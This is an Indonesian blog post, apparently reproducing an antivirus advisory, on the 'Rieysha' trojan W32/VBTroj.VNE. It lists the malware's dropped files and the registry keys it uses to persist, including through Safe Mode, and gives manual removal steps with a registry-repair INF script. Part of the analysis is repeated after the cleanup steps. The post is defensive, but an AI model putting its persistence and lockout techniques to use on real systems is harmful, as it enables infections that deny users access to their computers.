Sabtu, 31 Oktober 2009

Trojan: W32/VBTroj.VNE Rieysha

Jika komputer anda menampilkan pesan notepad dengan nama file "system32pesan_dari_rieysha.txt" sebagai berikut (lihat gambar 1) :


sayang kapan kamu kembali ke indonesia?




apa kamu kembali dengan hatimu yang dulu?



 



by:rieysha



 



Anda jangan buru-buru senang atau GR, apalagi anda buru-buru kembali ke Indonesia. Karena anda bukan mendapatkan pesan dari Rieysha, melainkan komputer anda terinfeksi virus W32/VBTroj.VNE.
Virus Fakhricker

Begitu pula jika pesan tersebut muncul di file MS Word anda dengan nama "system32pesan.doc" dengan pesan (lihat dibawah) :

yanx kapan kamu balik?

aku sudah kangen berat nih

kenapa sih mesti pergi jauh dariku

apa kamu kembali dengan hatimu yang dulu

apa aku akan merasakan kehangatan cinta yang dulu
Microsoft

Setelah sebelumnya muncul virus dengan nama W32/VBTroj.AOQB atau lebih dikenal dengan nama virus Nadia Saphira yang merupakan reinkarnasi dari virus Donal Bebek, kini telah muncul virus baru dengan nama W32/VBTroj.VNE atau lebih dikenal dengan nama virus [Rieysha]. Virus ini juga menggunakan nama acak untuk menamai filenya, salah satunya adalah ikut2an mencatut nama NadiaSafira.exe sebagai nama filenya. Namun jika dilihat dari aksinya virus reinkarnasi Rieysha yang satu ini lebih ganas dibandingkan virus Nadia Saphira W32/VBTroj.AOQB.
Virus ini dibuat dengan menggunakan bahasa Borland Delphi dengan ukuran sekitar 228 KB dan jika dilihat dari pesan yang akan ditampilkan oleh pembuat virus, kemungkinan virus ini berasal dari kota Gudeg tempat asal Mang Engking. Kalau Mang Engking sukses buka restoran dengan menu Udang Galah, maka virus jebolan [Rieysha] ini juga sukses merepotkan korbannya seperti pada virus W32/Delf.DCDW yang pernah dibuat sebelumnya.



Virus ini lebih mudah di ketahui hanya dengan melihat icon dari file yang menyertainya, yakni menggunakan icon gambar dengan rupa seorang gadis bersanggul seperti terlihat pada gambar dibawah ini
Icon

Ciri-Ciri komputer yang terinfeksi

*

Mengganti tampilan walpaper/desktop

Ciri-ciri yang dapat dikenali dari virus ini adalah dimana virus ini akan menutup desktop/wallpaper dengan wallpaper dirinya yang berisi pesan error, dengan digantinya walpaper ini maka user sudah tidak bisa mengakses komputer tersebut, jadi pembersihan hanya dapat dilakukan pada mode “DOS” atau dengan menggunakan software lain seperti “Mini PE”

*

Merubah format penanggalan dari PM/AM menjadi [Rieysha]
*

Merubah nama Organisasi dan pemilik OS menjadi

- RegisteredOrganization = kamu kembali

- RegisteredOwner = sayang kapan

*

Disable beberapa fungsi Windows seperti

o Disable Task Manager

o Menyembunyikan menu ShutDown komputer

o Menyembunyikan Drive

o Mengaktifkan fungsi Autorun, agar virus dapat aktif secara otomatis pada saat user mengakses Drive/Flash Disk

o Menyembunyikan fungsi pencarian file/folder [Search]

o Menyembunyikan [Folder Options]

o Menyembunyikan [Run]

o Menyembunyikan [Start Menu Programs]



Dengan update terbaru Norman Security Suite mendeteksi virus ini sebagai W32/VBTroj.VNE
Norton

File induk virus

Pada saat virus ini aktif ia akan mencoba untuk membuat file induk yang cukup banyak mencapai lebih dari 200 file di setiap direktori yang telah ditentukan dengan nama file acak yakni :



o Root Drive [C:\ atau D:\]

o C:\Windows

o C:\Windows\system32

o C:\Documents and Settings\%user%\Application Data%angka%Admin.exe



[Contoh: Application Data90Admin.exe]



o C:\Documents and Settings\%user%\Local Settings\Application Data%angka%r13y5h4ku.exe



[Contoh: Application Data90r13y5h4ku.exe]



o C:\Documents and Settings\%user%\Start Menu\Programs\Startup%angka%AVG Test Center.exe



[Contoh: Startup90AVG Test Center.exe] 26 files



File yang akan dibuat ini akan mempunyai ciri-ciri
Icon

> Menggunakan icon

> Ukuran File 228 KB

> Type file “Application”

> Ekstensi EXE
WOW

File induk virus

Virus ini juga akan membuat file di direktori :



o C:\CeweNakal.scr

o C:\Windows

- Oemlogo.pif

- Taksman.com

- system32folder.htt

- system32desktop.ini

- system32pesan_dari_rieysha.txt

- system32pesan.doc

- system32Autorun.inf

- system32pesanku.bat

- system32pesanQ.htm

- system32klikAku.bat

- system32klik2kali.bat

- system32rieysha.jpg

o C:\Documents and Settings\win321.exe

o C:\WINDOWS\Web\Printers\Write.exe

o C:\WINDOWS\Web\download.exe

o C:\Windows\Cursors\newCursor.exe

o C:\Windows\Debug\adminMode.exe

o C:\Windows\Font\rieyshaTrueType.exe

o C:\Windows\Help\userhelping.exe

o C:\Windows\java\packet.exe

o C:\Windows\Media\newmedia.exe

o C:\Windows\msagent\agentkvr.exe

o C:\Windows\registration\registy.exe

o C:\Windows\repair\setup.exe

o C:\windows\tasks\newScedule.exe

o C:\windows\system32\win34.exe

o C:\WINDOWS\system\oeminfo.exe

o C:\Windows\softwaredistribution\downloads.exe

o C:\Program Files\Internet Explorer

- hacker.exe

- IEfree.exe

o D:\puisi.txt [semua drive]



Registry

Agar salah satu dari sekian banyak file yang dibuat ini dapat dijalankan saat komputer dinyalakan, ia akan merubah beberapa registry berikut:

*

HKCU\Softawre\microsoft\Windows\currentVersion\Run

- r13y5h4.exe = C:\WINDOWS\r13y5h4.exe

*

HKLM\Software\microsoft\WindowsNT\CurrentVersion\Winlogon

- Shell = C:\windows\system32\win34.exe

- userinit = C:\windows\system32\win34.exe

Untuk memperkuat pertahanannya ia akan mencoba untuk mematikan beberapa fungsi windows seperti :

- Disable Task Manager

- Menyembunyikan menu [ShootDown komputer]

- Menyembunyikan Drive

- Menyembunyikan fungsi pencarian [Search]

- Menyembunyikan [Folder Options]

- Menyembunyikan [Run]

- Menyembunyikan [Start Menu Programs]

- Blok [Explorer]



Dengan terlebih dahulu membuat string pada registry berikut:



HKCU\Software\Microsoft\Windows\CurrentVersion\Policies

- Explorer

HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

- NoClose

- NoDrives

- NoDriveTypeAutoRun

- NoFind

- NoFolderOptions

- NoRun

- NoStarMenuMorePrograms

- NoViewOnDrive

HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System

- DisableCMD

- DisableRegistryTools

- DisableTaskMgr

HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

- NoCLose

- NoControlPanel

- NoDrives

- NoFind

- NoFolderOptions

- NoLOgoff

- NoRun

- NoSetFolders

- NoTrayContextMenu

- NoViewOnDrive

- NoWindowsUpdate

- StartMenuLogOff

HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System

- NoDispCPL

- DisableRegistryTools

- DisableTaskMgr



Aktif pada mode “safe mode” dan “safe mode with command prompt”

Virus ini juga akan aktif walaupun komputer booting pada mode “safe mode” atau “safe mode with command prompt” sehingga semakin mempersulit peroses pembersihan dengan membuat sring pada regustry berikut.



HKLM\Software\microsoft\WindowsNT\CurrentVersion\Winlogon

- Shell = C:\windows\system32\win34.exe

- userinit = C:\windows\system32\win34.exe



HKLM\System\ControlSet001\COntrol\safeboot

- AlternateShell = r13y5h4.exe



HKLM\System\CurrentControlSet\COntrol\safeboot

- AlternateShell = r13y5h4.exe



Jejak sang Virus

Rupanya bukan cuma Riyani Jangkaru saja yang dapat meninggalkan “jejak petualangan” nya tetapi virus pun bisa meninggalkan jejak agar di lebih dikenal. Berikut beberapa jejak yang akan di tinggalkan oleh W32/VBTroj.VNE



- Merubah format penanggalan dari AM/PM menjadi "rieysha"
Windows

Untuk merubah format penanggalan ini, W32/VBTrojVNE ini akan merubah string pada registry:



HKCU\Control Panel\International

- s1159 = rieysha

- s2359 = rieysha



Merubah nama pemilik Windows (lihat gambar 7)

- RegisteredOrganization = kamu kembali

- RegisteredOwner = sayang kapan
System

Untuk merubah format penanggalan ini, W32/VBTroj.VNE ini akan merubah string pada registry:



HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion

- RegisteredOrganization = kamu kembali

- RegisteredOwner = sayang kapan



- Merubah halaman utama [Start page] Internet Explorer menjadi [http://h1.ripway.com/anharku]



Untuk merubah halaman web ini, W32/VBTrojVNE ini akan merubah string pada registry:



HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main

- http://h1.ripway.com/anharku



Pesan sang petualang

Pada saat menginjakan kakinya di komputer target, W32/VBTroj.VNE akan menorehkan beberapa pesan yang ditujukan kepada “pujaan hati” nya, dalam bentuk file yang akan disimpan di direktori [C:\Windows], berikut beberapa pesan yang akan di buat oleh virus ini terlihat dalam gambar 1 dan 2 di atas.



- system32pesan_dari_rieysha.txt

- system32pesan.doc

- system32pesanku.bat

- system32pesanQ.htm



Media Penyebaran

Untuk mempercepat penyebaranya, ia akan memanfaatkan media Flash Disk dengan membuat file induk dengan nama file acak. Agar virus ini dapat aktif secara otomatis ia akan membuat 3 (tiga) buah file untuk menjalankan salah satu file induk [film.exe] secara otomatis. (lihat gambar 8, 9 dan 10)



- C:\Windows\system32\system32folder.htt

- C:\Windows\system32\system32desktop.ini

- C:\Windows\system32\system32Autorun.inf
Error

Microsoft

Microsoft

Menguasai komputer

Dari sekian aksi yang dilakukan di atas, virus ini mempunyai satu tujuan yakni untuk menguasai komputer target dengan cara memblok agar user tidak dapat mengakses komputer sebelum virus tersebut dibersihkan. Untuk melakukan hal ini ia akan mengganti wallpaper/desktop dengan wallpaper dirinya yang berisi pesan Error serta menampilkan pesan-pesan lainnya. Oleh karena itu pembersihan melalui “safe mode” atau “safe mode with command prompt” pun tidak akan mampu menyingkirkan virus ini kecuali jika pembersihan dilakukan pada mode “DOS” atau menggunakan software lain, contohnya dengan menggunakan Windows Mini PE [www.minipe.org]

Microsoft
Cara membersihkan W32/VBTroj.VNE

Karena virus ini tidak bisa di bersihkan baik pada mode “safe mode” atau “safe mode with command prompt” maka sebaiknya pembersihan dilakukan pada mode DOS atau dengan menggunakan software lain seperti Bart PE atau Mini PE dimana pembersihan ini dapat dilakukan secara manual atau dengan menjalankan removal tools [jika sudah mengenali]



Untuk pembersihan kali ini, kita akan menggunakan software Mini PE, silahkan download tools tersebut di alamat www.minipe.org, kemudian burn ke CD dan booting komputer dengan menggunakan CD tersebut. Setelah berhasil booting dengan menggunakan CD tersebut lakukan langkah pembersihan selanjutnya.

Error

1.

Hapus file virus di drive

Gunakan tools [Windows explorer] untuk memudahkan dalam mencari dan menghapus file induk virus.



- Klik [miniPE2XT]

- Klik [Programs]

- Klik [File Management]

- Klik [Windows Explorer]



Kemudian hapus file berikut:



o [C:\] atau Drive lain termasuk Flash disk

o C:\Windows

o C:\Windows\system32

o C:\Documents and Settings\%user%\Application Data%angka%Admin.exe



[Contoh: Application Data90Admin.exe]



o C:\Documents and Settings\%user%\Local Settings\Application Data%angka%r13y5h4ku.exe



[Contoh: Application Data90r13y5h4ku.exe]



o C:\Documents and Settings\%user%\Start Menu\Programs\Startup%angka%AVG Test Center.exe



[Contoh: Startup90AVG Test Center.exe] 26 files

o C:\Documents and Settings\win321.exe

o C:\WINDOWS\Web\Printers\Write.exe

o C:\WINDOWS\Web\download.exe

o C:\Windows\Cursors\newCursor.exe

o C:\Windows\Debug\adminMode.exe

o C:\Windows\Font\rieyshaTrueType.exe

o C:\Windows\Help\userhelping.exe

o C:\Windows\java\packet.exe

o C:\Windows\Media\newmedia.exe

o C:\Windows\msagent\agentkvr.exe

o C:\Windows\registration\registy.exe

o C:\Windows\repair\setup.exe

o C:\windows\tasks\newScedule.exe

o C:\windows\system32\win34.exe

o C:\WINDOWS\system\oeminfo.exe

o C:\Windows\softwaredistribution\downloads.exe

o C:\Program Files\Internet Explorer

hacker.exe

IEfree.exe



Catatan:

Hapus file virus yang mempunyai ciri-ciri:

- Menggunakan icon
Microsoft

Ukuran 228 KB

- Type file “Application”

- Ekstensi EXE



Untuk mempercepat pencarian sebaiknya menggunakan tools pencarian [Search], caranya:

- Buka [Windows Explorer]

- Klik tombol [Search]

- Pada kolom "Search for files or folders names" isi dengan format *.exe

- Pada kolom "Look in:" pilih drive yang akan di periksa

- kKik opsi [Search Options >>]

- Pilih opsi "Size"

§ Pilih "At most"

§ Isi 229

- Klik opsi "Advanced Options"

§ Pilih opsi "Search System folders"

§ Pilih opsi "Search hidden files and folders"

§ Pilih opsi "Search subfolders"

- Klik tombol "Search Now" untuk memulai pencarian

- Kemdian hapus file virus yang berhasil ditemukan sesai dengan ciri-ciri yang telah disebutkan di atas.



Hapus juga file berikut:



- C:\CeweNakal.scr

- C:\Windows

§ Oemlogo.pif

§ TAKSMAN.com

§ system32folder.htt

§ system32desktop.ini

§ system32pesan_dari_rieysha.txt

§ system32pesan.doc

§ system32Autorun.inf

§ system32pesanku.bat

§ system32pesanQ.htm

§ system32klikAku.bat

§ system32klik2kali.bat

§ system32rieysha.jpg

- D:\Puisi.txt

2.

Hapus/edit kembali registry yang sudah diubah virus

o Masih di Mini PE, klik

o Klik MiniPE2XT]

o Klik [Programs]

o Klik [Avast! Registry Editor]

o Klik [Registry Editor]

o Setelah muncul layar [Select File With Registry], klik tombol [Load selected OS registry], jika muncul layar konfirmasi, klik tombol [OK]

Microsoft

o Kemudian cari dan ubah registry berikut:

- _LOCAL_MACHINE_SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon



§ Klik 2x pada string [Shell], kemudian pada kolom “string value data” ubah menjadi [explorer.exe], Kemudian klik tombol [OK]



§ Klik 2x pada string [Userinit], kemudian pada kolom “string value data” ubah menjadi [%System%:\userinit.exe,], Kemudian klik tombol [OK]



Catatan:

%system% ini berbeda-beda:

· [C:\Windows\system32] à Windows XP/2003

· [C:\Winnt\system32] à Windows 2000



- _LOCAL_MACHINE_SOFTWARE\Microsoft\Windows\CurrentVersion\Run

§ Hapus string [r13y5h4.exe]



- _LOCAL_MACHINE_SYSTEM\ControlSet001\Control\SafeBoot

§ Klik 2x pada string [AlternateShell], kemudian pada kolom [String Value Data] ganti menjadi CMD.exe, kemudian klik tombol [OK]



- _LOCAL_MACHINE_SYSTEM\ControlSet002\Control\SafeBoot

§ Klik 2x pada string [AlternateShell], kemudian pada kolom [String Value Data] ganti menjadi CMD.exe, kemudian klik tombol [OK]



- _LOCAL_MACHINE_SYSTEM\CurrentControlSet\Control\SafeBoot

§ Klik 2x pada string [AlternateShell], kemudian pada kolom [String Value Data] ganti menjadi CMD.exe, kemudian klik tombol [OK]



- _LOCAL_MACHINE_SOFTWARE\Microsoft\Windows\CurrentVersion\Policies, kemudian hapus string berikut:

§ Explorer



- _LOCAL_MACHINE_SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer, kemudian hapus string berikut:



§ NoClose

§ NoDrives

§ NoDriveTypeAutoRun

§ NoFind

§ NoFolderOptions

§ NoRun

§ NoStarMenuMorePrograms

§ NoViewOnDrive



- _LOCAL_MACHINE_SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, kemudian hapus string berikut:



§ DisableCMD

§ DisableRegistryTools

§ DisableTaskMgr



- _LOCAL_MACHINE_SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer, kemudian hapus string berikut:



§ NoCLose

§ NoControlPanel

§ NoDrives

§ NoFind

§ NoFolderOptions

§ NoLOgoff

§ NoRun

§ NoSetFolders

§ NoTrayContextMenu

§ NoViewOnDrive

§ NoWindowsUpdate

§ StartMenuLogOff



- _LOCAL_MACHINE_SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, kemudian hapus string berikut:



§ NoDispCPL

§ DisableRegistryTools

§ DisableTaskMgr



- _LOCAL_MACHINE_SOFTWARE\Microsoft\WindowsNT

§ Pada string [RegisteredOrganization] ubah “string value data” sesuai dengan keinginan Anda

§ Pada string [RegisteredOwner] ubah “string value data” sesuai dengan keinginan Anda



- _USER_%user%Software\Microsoft\Windows\CurrentVersion\Run

§ Hapus string [r13y5h4.exe]



- _User_%user%\Software\Microsoft\Internet Explorer\Main

§ Pada string [Start Page] ubah “string value data” menjadi [about:blank]



- _User_%user%\Control Panel\International

§ Pada string [s1159] ubah “String value data” menjadi [AM]

§ Pada string [s2359] ubah “string value data” menjadi [PM]



3.

Restart komputer
4.

Fix ulang registry untuk memastikan semua registry sudah di perbaiki, silahkan copy script dibawah ini pada program “notepad” kemudian simpan dengan nama repair.inf



Catatan

Jalankan file repair.inf ini setelah komputer restart



Berikut script yang harus di copy



[Version]

Signature="$Chicago$"

Provider=Vaksincom Oyee



[DefaultInstall]

AddReg=UnhookRegKey

DelReg=del



[UnhookRegKey]

HKLM, Software\CLASSES\batfile\shell\open\command,,,"""%1"" %*"

HKLM, Software\CLASSES\comfile\shell\open\command,,,"""%1"" %*"

HKLM, Software\CLASSES\exefile\shell\open\command,,,"""%1"" %*"

HKLM, Software\CLASSES\piffile\shell\open\command,,,"""%1"" %*"

HKLM, Software\CLASSES\regfile\shell\open\command,,,"regedit.exe "%1""

HKLM, Software\CLASSES\scrfile\shell\open\command,,,"""%1"" %*"

HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, Shell,0, "Explorer.exe"

HKCU, Control Panel\Desktop, Wallpaper,0,

HKCU, Software\Microsoft\Internet Explorer\Main, Start Page,0, "about:blank"

HKCU, Control Panel\International, s1159,0, "AM"

HKCU, Control Panel\International, s2359,0, "PM"

HKLM, SYSTEM\ControlSet001\Control\SafeBoot, AlternateShell,0, "cmd.exe"

HKLM, SYSTEM\CurrentControlSet\Control\SafeBoot, AlternateShell,0, "cmd.exe"

HKLM, SOFTWARE\Classes\exefile,,,application

HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion, RegisteredOrganization,0, "Organization"

HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion, RegisteredOwner,0, "Owner"

HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoDriveTypeAutoRun,0x000000ff,255

HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer, NoDriveTypeAutoRun,0x000000ff,255





[del]

HKCU, Softawre\microsoft\Windows\currentVersion\Run, r13y5h4.exe

HKCU, Software\Microsoft\Windows\CurrentVersion\Policies, explorer

HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableRegistryTools

HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableCMD

HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableTaskMgr

HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,NoFolderOptions

HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,NoRecentDocsMenu

HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,NoRun

HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,NoFind

HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,NoTrayContextMenu

HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,NoViewContextMenu

HKCU, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoClose

HKCU, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoDrives

HKCU, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoStarMenuMorePrograms

HKCU, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoViewOnDrive

HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoClose

HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoControlPanel

HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoDrives

HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoFind

HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoFolderOptions

HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoLogoff

HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoRun

HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoSetFolders

HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoTrayCOntextMenu

HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoViewOnDrive

HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoWindowsUpdate

HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoStartMenuLogoff

HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system,NoDispCPL

HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system,DisableRegistryTools

HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system,DisableTaskMgr

HKCU, Software\Microsoft\Internet Explorer\Main, Window Title

5.

Restart komputer, kemudian login tanpa menggunakan CD Mini PE
6.

Jalankan repair.inf untuk membersihkan registry yang sudah di buat/diubah oleh virus caranya:



o Klik kanan repair.inf

o Klik Install


Jika komputer anda menampilkan pesan notepad dengan nama file "system32pesan_dari_rieysha.txt" sebagai berikut (lihat gambar 1) :


sayang kapan kamu kembali ke indonesia?




apa kamu kembali dengan hatimu yang dulu?



 



by:rieysha



 



Anda jangan buru-buru senang atau GR, apalagi anda buru-buru kembali ke Indonesia. Karena anda bukan mendapatkan pesan dari Rieysha, melainkan komputer anda terinfeksi virus W32/VBTroj.VNE.
Virus Fakhricker

Begitu pula jika pesan tersebut muncul di file MS Word anda dengan nama "system32pesan.doc" dengan pesan (lihat dibawah) :

yanx kapan kamu balik?

aku sudah kangen berat nih

kenapa sih mesti pergi jauh dariku

apa kamu kembali dengan hatimu yang dulu

apa aku akan merasakan kehangatan cinta yang dulu
Microsoft

Setelah sebelumnya muncul virus dengan nama W32/VBTroj.AOQB atau lebih dikenal dengan nama virus Nadia Saphira yang merupakan reinkarnasi dari virus Donal Bebek, kini telah muncul virus baru dengan nama W32/VBTroj.VNE atau lebih dikenal dengan nama virus [Rieysha]. Virus ini juga menggunakan nama acak untuk menamai filenya, salah satunya adalah ikut2an mencatut nama NadiaSafira.exe sebagai nama filenya. Namun jika dilihat dari aksinya virus reinkarnasi Rieysha yang satu ini lebih ganas dibandingkan virus Nadia Saphira W32/VBTroj.AOQB.
Virus ini dibuat dengan menggunakan bahasa Borland Delphi dengan ukuran sekitar 228 KB dan jika dilihat dari pesan yang akan ditampilkan oleh pembuat virus, kemungkinan virus ini berasal dari kota Gudeg tempat asal Mang Engking. Kalau Mang Engking sukses buka restoran dengan menu Udang Galah, maka virus jebolan [Rieysha] ini juga sukses merepotkan korbannya seperti pada virus W32/Delf.DCDW yang pernah dibuat sebelumnya.



Virus ini lebih mudah di ketahui hanya dengan melihat icon dari file yang menyertainya, yakni menggunakan icon gambar dengan rupa seorang gadis bersanggul seperti terlihat pada gambar dibawah ini
Icon

Ciri-Ciri komputer yang terinfeksi

*

Mengganti tampilan walpaper/desktop

Ciri-ciri yang dapat dikenali dari virus ini adalah dimana virus ini akan menutup desktop/wallpaper dengan wallpaper dirinya yang berisi pesan error, dengan digantinya walpaper ini maka user sudah tidak bisa mengakses komputer tersebut, jadi pembersihan hanya dapat dilakukan pada mode “DOS” atau dengan menggunakan software lain seperti “Mini PE”

*

Merubah format penanggalan dari PM/AM menjadi [Rieysha]
*

Merubah nama Organisasi dan pemilik OS menjadi

- RegisteredOrganization = kamu kembali

- RegisteredOwner = sayang kapan

*

Disable beberapa fungsi Windows seperti

o Disable Task Manager

o Menyembunyikan menu ShutDown komputer

o Menyembunyikan Drive

o Mengaktifkan fungsi Autorun, agar virus dapat aktif secara otomatis pada saat user mengakses Drive/Flash Disk

o Menyembunyikan fungsi pencarian file/folder [Search]

o Menyembunyikan [Folder Options]

o Menyembunyikan [Run]

o Menyembunyikan [Start Menu Programs]



Dengan update terbaru Norman Security Suite mendeteksi virus ini sebagai W32/VBTroj.VNE
Norton

File induk virus

Pada saat virus ini aktif ia akan mencoba untuk membuat file induk yang cukup banyak mencapai lebih dari 200 file di setiap direktori yang telah ditentukan dengan nama file acak yakni :



o Root Drive [C:\ atau D:\]

o C:\Windows

o C:\Windows\system32

o C:\Documents and Settings\%user%\Application Data%angka%Admin.exe



[Contoh: Application Data90Admin.exe]



o C:\Documents and Settings\%user%\Local Settings\Application Data%angka%r13y5h4ku.exe



[Contoh: Application Data90r13y5h4ku.exe]



o C:\Documents and Settings\%user%\Start Menu\Programs\Startup%angka%AVG Test Center.exe



[Contoh: Startup90AVG Test Center.exe] 26 files



File yang akan dibuat ini akan mempunyai ciri-ciri
Icon

> Menggunakan icon

> Ukuran File 228 KB

> Type file “Application”

> Ekstensi EXE
WOW

File induk virus

Virus ini juga akan membuat file di direktori :



o C:\CeweNakal.scr

o C:\Windows

- Oemlogo.pif

- Taksman.com

- system32folder.htt

- system32desktop.ini

- system32pesan_dari_rieysha.txt

- system32pesan.doc

- system32Autorun.inf

- system32pesanku.bat

- system32pesanQ.htm

- system32klikAku.bat

- system32klik2kali.bat

- system32rieysha.jpg

o C:\Documents and Settings\win321.exe

o C:\WINDOWS\Web\Printers\Write.exe

o C:\WINDOWS\Web\download.exe

o C:\Windows\Cursors\newCursor.exe

o C:\Windows\Debug\adminMode.exe

o C:\Windows\Font\rieyshaTrueType.exe

o C:\Windows\Help\userhelping.exe

o C:\Windows\java\packet.exe

o C:\Windows\Media\newmedia.exe

o C:\Windows\msagent\agentkvr.exe

o C:\Windows\registration\registy.exe

o C:\Windows\repair\setup.exe

o C:\windows\tasks\newScedule.exe

o C:\windows\system32\win34.exe

o C:\WINDOWS\system\oeminfo.exe

o C:\Windows\softwaredistribution\downloads.exe

o C:\Program Files\Internet Explorer

- hacker.exe

- IEfree.exe

o D:\puisi.txt [semua drive]



Registry

Agar salah satu dari sekian banyak file yang dibuat ini dapat dijalankan saat komputer dinyalakan, ia akan merubah beberapa registry berikut:

*

HKCU\Softawre\microsoft\Windows\currentVersion\Run

- r13y5h4.exe = C:\WINDOWS\r13y5h4.exe

*

HKLM\Software\microsoft\WindowsNT\CurrentVersion\Winlogon

- Shell = C:\windows\system32\win34.exe

- userinit = C:\windows\system32\win34.exe

Untuk memperkuat pertahanannya ia akan mencoba untuk mematikan beberapa fungsi windows seperti :

- Disable Task Manager

- Menyembunyikan menu [ShootDown komputer]

- Menyembunyikan Drive

- Menyembunyikan fungsi pencarian [Search]

- Menyembunyikan [Folder Options]

- Menyembunyikan [Run]

- Menyembunyikan [Start Menu Programs]

- Blok [Explorer]



Dengan terlebih dahulu membuat string pada registry berikut:



HKCU\Software\Microsoft\Windows\CurrentVersion\Policies

- Explorer

HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

- NoClose

- NoDrives

- NoDriveTypeAutoRun

- NoFind

- NoFolderOptions

- NoRun

- NoStarMenuMorePrograms

- NoViewOnDrive

HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System

- DisableCMD

- DisableRegistryTools

- DisableTaskMgr

HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

- NoCLose

- NoControlPanel

- NoDrives

- NoFind

- NoFolderOptions

- NoLOgoff

- NoRun

- NoSetFolders

- NoTrayContextMenu

- NoViewOnDrive

- NoWindowsUpdate

- StartMenuLogOff

HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System

- NoDispCPL

- DisableRegistryTools

- DisableTaskMgr



Aktif pada mode “safe mode” dan “safe mode with command prompt”

Virus ini juga akan aktif walaupun komputer booting pada mode “safe mode” atau “safe mode with command prompt” sehingga semakin mempersulit peroses pembersihan dengan membuat sring pada regustry berikut.



HKLM\Software\microsoft\WindowsNT\CurrentVersion\Winlogon

- Shell = C:\windows\system32\win34.exe

- userinit = C:\windows\system32\win34.exe



HKLM\System\ControlSet001\COntrol\safeboot

- AlternateShell = r13y5h4.exe



HKLM\System\CurrentControlSet\COntrol\safeboot

- AlternateShell = r13y5h4.exe



Jejak sang Virus

Rupanya bukan cuma Riyani Jangkaru saja yang dapat meninggalkan “jejak petualangan” nya tetapi virus pun bisa meninggalkan jejak agar di lebih dikenal. Berikut beberapa jejak yang akan di tinggalkan oleh W32/VBTroj.VNE



- Merubah format penanggalan dari AM/PM menjadi "rieysha"
Windows

Untuk merubah format penanggalan ini, W32/VBTrojVNE ini akan merubah string pada registry:



HKCU\Control Panel\International

- s1159 = rieysha

- s2359 = rieysha



Merubah nama pemilik Windows (lihat gambar 7)

- RegisteredOrganization = kamu kembali

- RegisteredOwner = sayang kapan
System

Untuk merubah format penanggalan ini, W32/VBTroj.VNE ini akan merubah string pada registry:



HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion

- RegisteredOrganization = kamu kembali

- RegisteredOwner = sayang kapan



- Merubah halaman utama [Start page] Internet Explorer menjadi [http://h1.ripway.com/anharku]



Untuk merubah halaman web ini, W32/VBTrojVNE ini akan merubah string pada registry:



HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main

- http://h1.ripway.com/anharku



Pesan sang petualang

Pada saat menginjakan kakinya di komputer target, W32/VBTroj.VNE akan menorehkan beberapa pesan yang ditujukan kepada “pujaan hati” nya, dalam bentuk file yang akan disimpan di direktori [C:\Windows], berikut beberapa pesan yang akan di buat oleh virus ini terlihat dalam gambar 1 dan 2 di atas.



- system32pesan_dari_rieysha.txt

- system32pesan.doc

- system32pesanku.bat

- system32pesanQ.htm



Media Penyebaran

Untuk mempercepat penyebaranya, ia akan memanfaatkan media Flash Disk dengan membuat file induk dengan nama file acak. Agar virus ini dapat aktif secara otomatis ia akan membuat 3 (tiga) buah file untuk menjalankan salah satu file induk [film.exe] secara otomatis. (lihat gambar 8, 9 dan 10)



- C:\Windows\system32\system32folder.htt

- C:\Windows\system32\system32desktop.ini

- C:\Windows\system32\system32Autorun.inf
Error

Microsoft

Microsoft

Menguasai komputer

